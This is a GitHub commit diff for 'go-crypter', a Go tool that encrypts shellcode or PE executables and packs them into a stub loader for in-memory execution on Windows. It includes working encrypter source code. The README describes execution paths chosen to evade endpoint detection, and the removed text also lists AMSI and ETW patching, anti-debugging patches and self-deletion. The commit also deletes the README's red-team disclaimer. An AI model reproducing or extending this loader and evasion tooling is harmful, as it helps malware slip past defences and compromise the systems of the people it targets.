carved4
diff --git a/‎README.md‎
Lines changed: 35 additions & 95 deletions b/‎README.md‎
Lines changed: 35 additions & 95 deletions
diff --git a/‎crypt/crypt.go‎
Lines changed: 30 additions & 50 deletions b/‎crypt/crypt.go‎
Lines changed: 30 additions & 50 deletions
@@ -1,133 +1,73 @@
 # go-crypter
 
-A cryptographic payload loader and executor designed for advanced in-memory execution techniques. This project combines strong encryption, compression, and sophisticated evasion capabilities to execute both shellcode and PE files directly in memory.
+this is a loader that consists of two parts - the encrypter and the loader, both PEs and shellcode can be encrypted and embedded
+into a loader that offers multiple execution options for shellcode, pe's are just mapped and their entry point is executed with ntdll!rtlcreateuserthread. for shellcode, you can take a few different paths each with their own upsides and downsides evasion wise. this project is meant to be compiled on win10+ x64 only.
 
-## Features
+# enclave
+1. uses mscoree!GetProcessExecutableHeap, vdsutil!VdsHeapAlloc, and ntdll!LdrCallEnclave
+2. memory region of shellcode is RWX by default, as GetProcessExecutableHeap is usually used for JIT stuff
 
-### Encryption & Compression
+# indirect syscalls
+1. uses ntdll!NtAllocateVirtualMemory, ntdll!ProtectVirtualMemory to allocate memory and flip prots (takes PAGE_READWRITE -> PAGE_EXECUTE_READ path
+2. uses ntdll!RtlCreateUserThread to execute entry point
+
+# run once
+1. uses ntdll!NtAllocateVirtualMemory, ntdll!ProtectVirtualMemory to allocate memory and flip prots (also takes PAGE_READWRITE -> PAGE_EXECUTE_READ path
+2. executes entry point with ntdll!RtlRunOnceExecuteOnce which does exactly what it says
+
+## features
+
+### encryption & compression
 - **Multiple encryption algorithms**: ChaCha20-Poly1305, AES-GCM, Twofish-GCM
 - **Argon2id key derivation** with configurable parameters for enhanced security
 - **Automatic compression** using zlib to reduce payload size
 - **CBOR serialization** for efficient binary encoding
 
-### Execution Capabilities
-- **Dual payload support**: Handles both raw shellcode and PE executables
-- **In-memory PE execution**: Full RunPE implementation with proper relocation and import resolution
-- **Shellcode injection**: Direct shellcode execution using advanced injection techniques
-
-### Evasion Features
-- **Self-deletion**: Automatic removal of the stub executable from disk (this being called prior to execution may seem weird, but as long as your payload is mapped into memory already (it is, it's embedded) execution will fire off, and the stub gets removed)
-- **Anti-monitoring patches**: Disables AMSI, ETW, debugging, and trace logging
-- **Direct syscalls**: Utilizes [go-direct-syscall](https://github.com/carved4/go-direct-syscall) for API evasion
-- **Memory-only execution**: No disk artifacts after initial execution
+### capabilities 
+- **Dual payload support**: handles both raw shellcode and PE executables
+- **In-memory PE execution**: Full runpe implementation with proper relocation and import resolution
+- **Shellcode injection**: direct shellcode execution using some silly injection techniques
 
-## Usage
 
-### Encrypting Payloads
+### encrypting payloads
 
 ```bash
-# Encrypt shellcode (default)
-./crypt -type shellcode payload.bin
+# encrypt shellcode (default, used chacha20) 
+go run crypt.go payload.bin
 
-# Encrypt PE executable
-./crypt -type exe malware.exe
-
-# Specify encryption algorithm
-./crypt -alg chacha20 -type exe payload.exe
+# encrypt PE executable with aesgcm
+go run crypt.go payload.exe -alg aesgcm 
 ```
 
-### Available Options
+### available options
 - `-alg`: Encryption algorithm (chacha20, aesgcm, twofish)
-- `-type`: Payload type (shellcode, exe)
 
-## Architecture
+## architecture
 
 The project consists of two main components:
 
-1. **Crypt**: Encrypts and packages payloads into CBOR format with embedded metadata
-2. **Stub**: Self-contained executable that decrypts and executes the embedded payload
-
-## Execution Flow
-
-```mermaid
-flowchart TD
-    A["Stub Execution Starts"] --> B["Decrypt Embedded Payload"]
-    B --> C["Extract Payload Metadata"]
-    C --> D["Decompress if Compressed"]
-    D --> E["Self-Delete Executable"]
-    E --> F["Apply AMSI/ETW Patches"]
-    F --> G{"Check Payload Type"}
-    G -->|Shellcode| H["Execute via NtInjectSelfShellcode"]
-    G -->|PE Executable| I["Execute via RunPE"]
-    H --> J["Payload Running in Memory"]
-    I --> J
-    
-    style A fill:#e1f5fe,stroke:#000,stroke-width:2px,color:#000
-    style B fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style C fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style D fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style E fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style F fill:#fff3e0,stroke:#000,stroke-width:2px,color:#000
-    style G fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style H fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style I fill:#f5f5f5,stroke:#000,stroke-width:2px,color:#000
-    style J fill:#c8e6c9,stroke:#000,stroke-width:2px,color:#000
-```
-
-## Technical Details
-
-### Cryptographic Implementation
-- **Key derivation**: Argon2id with configurable time, memory, and thread parameters
-- **Authentication**: All algorithms provide authenticated encryption (AEAD)
-- **Random generation**: Cryptographically secure random passwords, salts, and nonces
-
-### Anti-Detection Mechanisms
-- **PatchAMSI**: Disable Anti-Malware Scan Interface
-- **PatchETW**: Disable Event Tracing for Windows  
-- **PatchDbgUiRemoteBreakin**: Prevent remote debugger attachment
-- **PatchNtTraceEvent**: Prevent trace event logging
-- **PatchNtSystemDebugControl**: Prevent debug control operations
-
-### Memory Execution
-- **Section mapping**: Uses NtCreateSection and NtMapViewOfSection for memory allocation
-- **Import resolution**: Dynamically resolves imported functions
-- **Relocation handling**: Properly handles address relocations for ASLR
-- **TLS callbacks**: Executes Thread Local Storage initialization routines
-
-## Dependencies
-
-- `github.com/carved4/go-direct-syscall` - Direct Windows syscall interface
-- `github.com/Binject/debug` - PE file parsing and manipulation
-- `github.com/fxamacker/cbor/v2` - CBOR encoding/decoding
-- `golang.org/x/crypto` - Cryptographic algorithms
+1. **crypt**: encrypts and packages payloads into CBOR format with embedded metadata
+2. **stub**: self-contained executable that decrypts and executes the embedded payload
 
 ## Building
 
 ```bash
-# Build the encryption tool
-go build -o crypt.exe ./crypt
-
-# Build the stub (after encrypting a payload)
-go build -o stub.exe ./stub
+# build the stub (after encrypting a payload)
+cd ../stub && go build -o stub.exe
 ```
 
-## Running
+## running
 ```bash
 # after running the crypter tool and building the stub, you can pass some flags to specify how you want to run
 
-./stub.exe -sleepy # self inject with page no access delay to trip EDRs
+./stub.exe -enclave
 
-./stub.exe -ghost # self inject standard
+./stub.exe -indirec
 
-./stub.exe -phantom # inject with queueapc + page no access delay 
+./stub.exe -once
 
 # or 
 
 ./stub.exe # with no flags to run an embedded EXE or shellcode with the default methods
 
 ```
-
-
-## Security Considerations
-
-This tool is designed for security research, penetration testing, and red team exercises. Users are responsible for ensuring compliance with applicable laws and regulations in their jurisdiction. 
@@ -20,25 +20,23 @@ import (
 	"golang.org/x/crypto/twofish"
 )
 
-// Default Argon2 parameters
 const (
 	argonTime    uint32 = 1
 	argonMemory  uint32 = 64 * 1024
 	argonThreads uint8  = 4
 	argonKeyLen  uint32 = chacha20poly1305.KeySize
 	saltSize            = 16
-	passwordSize        = 32 // Size of the random password
+	passwordSize        = 32
 )
 
-// PayloadData represents the structure of our CBOR payload
 type PayloadData struct {
 	EncryptedBytes []byte `cbor:"encrypted"`
 	Password       []byte `cbor:"password"`
 	Salt           []byte `cbor:"salt"`
 	Nonce          []byte `cbor:"nonce"`
 	Alg            string `cbor:"alg"`
-	Compressed     bool   `cbor:"compressed,omitempty"` // Flag to indicate if data is compressed
-	PayloadType    string `cbor:"payload_type"`          // "exe" or "shellcode"
+	Compressed     bool   `cbor:"compressed,omitempty"`
+	PayloadType    string `cbor:"payload_type"`
 	ArgonParams    struct {
 		Time    uint32 `cbor:"time"`
 		Memory  uint32 `cbor:"memory"`
@@ -48,36 +46,34 @@ type PayloadData struct {
 
 func main() {
 	algFlag := flag.String("alg", "chacha20", "encryption algorithm: chacha20, aesgcm, twofish")
-	typeFlag := flag.String("type", "shellcode", "payload type: exe or shellcode")
+	typeFlag := flag.String("type", "shellcode", "type of file, you don't need to set this")
 	flag.Parse()
 
 	if flag.NArg() < 1 {
-		fmt.Printf("Run with %s <inputfile>\n", os.Args[0])
+		fmt.Printf("[+] run with %s <inputfile>\n", os.Args[0])
 		os.Exit(1)
 	}
 
 	fname := flag.Arg(0)
+
 	plaintextBytes, err := os.ReadFile(fname)
 	if err != nil {
-		log.Fatalf("Failed to read file: %v", err)
+		log.Fatalf("[-] failed to read file: %v", err)
 	}
 
 	stubDir := filepath.Join("..", "stub")
 	payloadPath := filepath.Join(stubDir, "payload.cbor")
 
-	// Generate a random password (instead of using the key directly)
 	password := make([]byte, passwordSize)
 	if _, err := io.ReadFull(rand.Reader, password); err != nil {
-		log.Fatalf("Failed to generate random password: %v", err)
+		log.Fatalf("[-] failed to generate random password: %v", err)
 	}
 
-	// Generate a random salt for Argon2
 	salt := make([]byte, saltSize)
 	if _, err := io.ReadFull(rand.Reader, salt); err != nil {
-		log.Fatalf("Failed to generate random salt: %v", err)
+		log.Fatalf("[-] failed to generate random salt: %v", err)
 	}
 
-	// Derive the encryption key using Argon2id
 	key := argon2.IDKey(password, salt, argonTime, argonMemory, argonThreads, argonKeyLen)
 
 	var aead cipher.AEAD
@@ -86,84 +82,75 @@ func main() {
 	case "aesgcm", "aes":
 		block, err := aes.NewCipher(key)
 		if err != nil {
-			log.Fatalf("Failed to create AES cipher: %v", err)
+			log.Fatalf("[-] failed to create AES cipher: %v", err)
 		}
 		aead, err = cipher.NewGCM(block)
 		if err != nil {
-			log.Fatalf("Failed to create AES-GCM AEAD: %v", err)
+			log.Fatalf("[-] failed to create AES-GCM AEAD: %v", err)
 		}
 	case "twofish":
 		block, err := twofish.NewCipher(key)
 		if err != nil {
-			log.Fatalf("Failed to create Twofish cipher: %v", err)
+			log.Fatalf("[-] failed to create Twofish cipher: %v", err)
 		}
 		aead, err = cipher.NewGCM(block)
 		if err != nil {
-			log.Fatalf("Failed to create Twofish-GCM AEAD: %v", err)
+			log.Fatalf("[-] failed to create Twofish-GCM AEAD: %v", err)
 		}
 	default:
 		aead, err = chacha20poly1305.New(key)
 		if err != nil {
-			log.Fatalf("Failed to create AEAD: %v", err)
+			log.Fatalf("[-] failed to create AEAD: %v", err)
 		}
 		alg = "chacha20"
 	}
 
-	// Generate a random nonce appropriate for the algorithm
 	nonce := make([]byte, aead.NonceSize())
 	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
-		log.Fatalf("Failed to generate random nonce: %v", err)
+		log.Fatalf("[-] failed to generate random nonce: %v", err)
 	}
 
-	// Compress the plaintext data before encryption
 	var dataToEncrypt []byte
-	compressed := true // Default to attempting compression
+	compressed := true
 
-	// Try to compress the data using zlib
 	var b bytes.Buffer
 	zw, err := zlib.NewWriterLevel(&b, zlib.BestCompression)
 	if err != nil {
-		log.Printf("Warning: Failed to create zlib writer: %v", err)
+		log.Printf("[!]: [-] failed to create zlib writer: %v", err)
 		compressed = false
 		dataToEncrypt = plaintextBytes
 	} else {
-		// Write data to the compressed buffer
 		_, err = zw.Write(plaintextBytes)
 		if err != nil {
-			log.Printf("Warning: Failed to compress data: %v", err)
+			log.Printf("[!]: [-] failed to compress data: %v", err)
 			compressed = false
 			dataToEncrypt = plaintextBytes
 		} else {
-			// Close to flush any pending data
 			err = zw.Close()
 			if err != nil {
-				log.Printf("Warning: Failed to finalize compression: %v", err)
+				log.Printf("[!]: [-] failed to finalize compression: %v", err)
 				compressed = false
 				dataToEncrypt = plaintextBytes
 			} else {
-				// Get the compressed data
 				compressedData := b.Bytes()
-
-				// Only use compression if it actually reduces size
 				if len(compressedData) < len(plaintextBytes) {
 					dataToEncrypt = compressedData
-					fmt.Printf("Compression reduced size from %d to %d bytes (%.2f%%)",
+					fmt.Printf("[+] compression reduced size from %d to %d bytes (%.2f%%)",
 						len(plaintextBytes), len(compressedData),
 						float64(len(compressedData))/float64(len(plaintextBytes))*100)
 				} else {
-					// Compression didn't help, use original data
 					compressed = false
 					dataToEncrypt = plaintextBytes
-					fmt.Println("Compression did not reduce size, using uncompressed data")
+					fmt.Println("[+] compression did not reduce size, using uncompressed data")
 				}
 			}
 		}
 	}
 
-	// Encrypt the data with authentication
 	encryptedBytes := aead.Seal(nil, nonce, dataToEncrypt, nil)
-
-	// Create the payload structure
+	if strings.Contains(fname, ".exe") {
+		flag.Set("type", "exe")
+	}
 	payload := PayloadData{
 		EncryptedBytes: encryptedBytes,
 		Password:       password,
@@ -173,33 +160,26 @@ func main() {
 		Compressed:     compressed,
 		PayloadType:    strings.ToLower(*typeFlag),
 	}
-
-	// Set the Argon2 parameters
 	payload.ArgonParams.Time = argonTime
 	payload.ArgonParams.Memory = argonMemory
 	payload.ArgonParams.Threads = uint8(argonThreads)
-
-	// Create CBOR encoder with compression options
 	encOpts := cbor.EncOptions{
-		Sort: cbor.SortBytewiseLexical, // Sort map keys for deterministic output
+		Sort: cbor.SortBytewiseLexical,
 	}
 
-	// Create encoder with options
 	encMode, err := encOpts.EncMode()
 	if err != nil {
-		log.Fatalf("Failed to create CBOR encoder: %v", err)
+		log.Fatalf("[-] failed to create CBOR encoder: %v", err)
 	}
 
-	// Marshal the payload to CBOR
 	cborData, err := encMode.Marshal(payload)
 	if err != nil {
-		log.Fatalf("Failed to marshal CBOR data: %v", err)
+		log.Fatalf("[-] failed to marshal CBOR data: %v", err)
 	}
 
-	// Write the CBOR data to file
 	if err := os.WriteFile(payloadPath, cborData, 0600); err != nil {
-		log.Fatalf("Failed to write CBOR payload: %v", err)
+		log.Fatalf("[-] failed to write CBOR payload: %v", err)
 	}
 
-	fmt.Printf("Encryption completed successfully!\nCBOR payload saved to:\n- %s\n", payloadPath)
-}
+	fmt.Printf("[+] encryption completed successfully!\nCBOR payload saved to:\n- %s\n", payloadPath)
+}